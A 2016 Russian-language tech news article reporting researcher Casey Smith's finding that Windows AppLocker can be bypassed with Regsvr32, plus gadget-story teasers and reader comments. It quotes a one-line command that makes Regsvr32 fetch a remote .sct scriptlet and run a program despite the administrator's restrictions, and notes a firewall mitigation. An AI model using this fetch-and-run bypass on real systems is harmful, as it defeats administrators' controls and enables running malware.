• У Xiaomi появилось геймерское кресло за $150 (5 фото)

    Как шутят эксперты, в Xiaomi, видимо, согласны на производство всего подряд, лишь бы удовлетворять потребительский спрос. На сей раз компания из Китая анонсировала AutoFull е-sports — кресло, подходящее и геймерам, и офисным работникам.
    Читать дальше
  • 3D-печатный подводный джетпак поможет плавать словно рыба (9 фото + видео)

    Студент Арчи ОБрайен давно мечтал о скольжении под водой на скорости её обитателей, и хотя подводные ранцы уже существуют, они либо снабжены моторами, либо медленны, либо чересчур тяжелы. И практически все известные устройства довольно дорого стоят. Так что парень разработал и успешно протестировал собственный вариант подводного джетпака.
    Читать дальше
  • Самодельный концептуальный мотоцикл оснастили авиационным двигателем (5 фото + видео)

    Бывший бразильский гонщик «Формулы-1» Тарсу Марки в настоящее время занимается разработкой неповторимых концептуальных мотоциклов. Последнюю из созданных изобретений можно смело назвать транспортным средством из будущего. Два безосевых колеса диаметром 90 см и авиадвигатель представляют собой основу невероятной конструкции.
    Читать дальше
  • Дизайнер соединил катамаран и велосипед в одно устройство (6 фото)

    Джозеп Рубау, бывший промышленный дизайнер из Volkswagen, создал педальный велотримаран, предназначенный для спортивных тренировок, и открыл компанию по его производству RedShark Bikes. Стартап выпускает три версии устройства начальный Fun, продвинутый Adventure и профессиональный Sport.
    Читать дальше
  • Google пригрозил сделать Android платным (2 фото)

    Google выписали штраф на 4.32 миллиарда евро, так как Еврокомиссия посчтитала, что интернет-корпорация нарушает антимонопольное законодательство. Компании вменили монопольное использование системы Android для продвижения своих сервисов. Глава Google не согласен с выводами Еврокомиссии и сообщил, что после исполнения всех требований Androi...
    Читать дальше

Безопасность Windows оказалась под угрозой

27 апреля 2016 | Windows
Безопасность Windows оказалась под угрозой

В течение многих лет в бизнес-ориентированных версиях Windows присутствует функция AppLocker, которая позволяет администратору регулировать запуск тех или иных программ на компьютере. Например, можно запретить установку любых программ или запуск уже имеющихся приложений, которые не относятся к работе сотрудника. Это несомненно полезно для компаний, стремящихся защитить свою структуру от потенциально опасного ПО, однако исследователь Кейси Смит (Casey Smith) выяснил, что полностью доверять AppLocker не стоит, поскольку обнаруженная им уязвимость позволяет обходить ограничения администратора с помощью одной строки кода. Таким образом хакерам ничего не стоит взломать компьютеры и запустить вредоносное ПО.

Кейси Смит указал на инструмент Regsvr32, который можно использовать не по назначению для скачивания из интернета определенного XML-файла. Ввод команды вида regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll и скачивание файла, приведет к запуску cmd.exe, который можно заменить на любую другую программу, несмотря на установленные администратором ограничения в AppLocker. Атака не оставляет следов на жестком диске и в реестре, а в арсенале Microsoft пока не существует соответствующей «заплатки» для этой уязвимости. Описание ее Смит опубликовал на сервисе GitHub. Как вариант защиты рекомендуется отрезать Regsvr32 от интернета с помощью файервола.

Источник: engadget.com
Понравился пост? Просоединяйтесь к нам в Facebook!

Написать комментарий


Включите эту картинку для отображения кода безопасности
обновить, если не виден код


Комментарии: 5

avatar
27 апреля 2016 10:17 Hilo
Есть повод разработчикам заняться работой
+ 2
Ответить
avatar
27 апреля 2016 10:58 Гость_Xumepa
С админом можно и договориться об установке необходимого ПО
+ 0
Ответить
avatar
27 апреля 2016 11:30 Гость_M
В россии, за рубежом зарплата сисадминрстраторов достаточно высокая дабы не договорились
+ 0
Ответить
avatar
27 апреля 2016 12:08 WadymOS
Это что ж за админ такой, с которым можно договориться?
+ 0
Ответить
avatar
28 апреля 2016 11:41 zlodeu
Я например! )))
+ 3
Ответить
В Вашем браузере отключен JavaScript. Для корректной работы сайта настоятельно рекомендуется его включить.